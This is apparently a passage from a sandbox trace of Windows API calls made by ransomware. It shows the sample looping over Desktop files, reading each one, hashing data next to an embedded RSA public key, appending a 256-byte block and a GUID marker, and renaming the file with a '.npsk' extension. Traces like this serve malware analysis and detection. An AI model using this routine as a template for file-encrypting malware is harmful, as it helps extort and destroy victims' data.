KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.990] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.991] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.991] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.991] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.991] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.991] GetLastError () returned 0x0 [0214.991] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.991] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.991] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.991] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.992] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.992] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.992] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.992] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.993] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xfa41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.993] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.993] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.993] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.993] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.993] CloseHandle (hObject=0x61c) returned 1 [0214.995] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SfxkhLPbwY80mBkm.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfxkhlpbwy80mbkm.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SfxkhLPbwY80mBkm.xls.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfxkhlpbwy80mbkm.xls.npsk")) returned 1 [0214.996] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.996] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.996] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.997] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.997] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe49592a0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x55009d80, ftLastAccessTime.dwHighDateTime=0x1d5e237, ftLastWriteTime.dwLowDateTime=0x55009d80, ftLastWriteTime.dwHighDateTime=0x1d5e237, nFileSizeHigh=0x0, nFileSizeLow=0x9e67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VUWIWnIn.flv", cAlternateFileName="")) returned 1 [0214.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VUWIWnIn.flv") returned=".flv" [0214.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VUWIWnIn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vuwiwnin.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.997] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=40551) returned 1 [0214.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.999] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x9e41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.999] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.001] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x9e67, lpOverlapped=0x0) returned 1 [0215.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.001] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.002] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.002] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.002] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.002] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.003] GetLastError () returned 0x0 [0215.003] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.003] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.003] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.003] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.003] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.003] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.003] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.003] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.004] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x9e67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.004] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.004] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.004] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.004] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.004] CloseHandle (hObject=0x61c) returned 1 [0215.010] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VUWIWnIn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vuwiwnin.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VUWIWnIn.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vuwiwnin.flv.npsk")) returned 1 [0215.012] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.012] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.012] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.013] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.013] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2b18a0, ftCreationTime.dwHighDateTime=0x1d5e5e0, ftLastAccessTime.dwLowDateTime=0xd97d2740, ftLastAccessTime.dwHighDateTime=0x1d5dd14, ftLastWriteTime.dwLowDateTime=0xd97d2740, ftLastWriteTime.dwHighDateTime=0x1d5dd14, nFileSizeHigh=0x0, nFileSizeLow=0x7c31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmmnVLU-BNO.avi", cAlternateFileName="WMMNVL~1.AVI")) returned 1 [0215.013] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmmnVLU-BNO.avi") returned=".avi" [0215.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmmnVLU-BNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmmnvlu-bno.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.014] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=31793) returned 1 [0215.014] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.031] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7c0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.031] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.032] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.032] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7c31, lpOverlapped=0x0) returned 1 [0215.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.033] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.034] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.034] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.034] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.034] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.034] GetLastError () returned 0x0 [0215.034] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.034] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.034] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.034] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.034] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.034] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.034] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.035] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.035] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7c31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.035] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.035] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.035] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.035] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.036] CloseHandle (hObject=0x61c) returned 1 [0215.042] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmmnVLU-BNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmmnvlu-bno.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmmnVLU-BNO.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmmnvlu-bno.avi.npsk")) returned 1 [0215.043] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.043] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.043] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.045] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.045] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc72eda30, ftCreationTime.dwHighDateTime=0x1d5dcdc, ftLastAccessTime.dwLowDateTime=0xe3aa6280, ftLastAccessTime.dwHighDateTime=0x1d5e108, ftLastWriteTime.dwLowDateTime=0xe3aa6280, ftLastWriteTime.dwHighDateTime=0x1d5e108, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x964-eas.m4a", cAlternateFileName="")) returned 1 [0215.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x964-eas.m4a") returned=".m4a" [0215.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x964-eas.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x964-eas.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.046] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=24976) returned 1 [0215.046] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.048] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x616a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.048] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.050] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x6190, lpOverlapped=0x0) returned 1 [0215.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.051] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.052] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.052] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.052] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.052] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.052] GetLastError () returned 0x0 [0215.052] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.052] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.052] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.052] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.052] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.052] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.052] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: 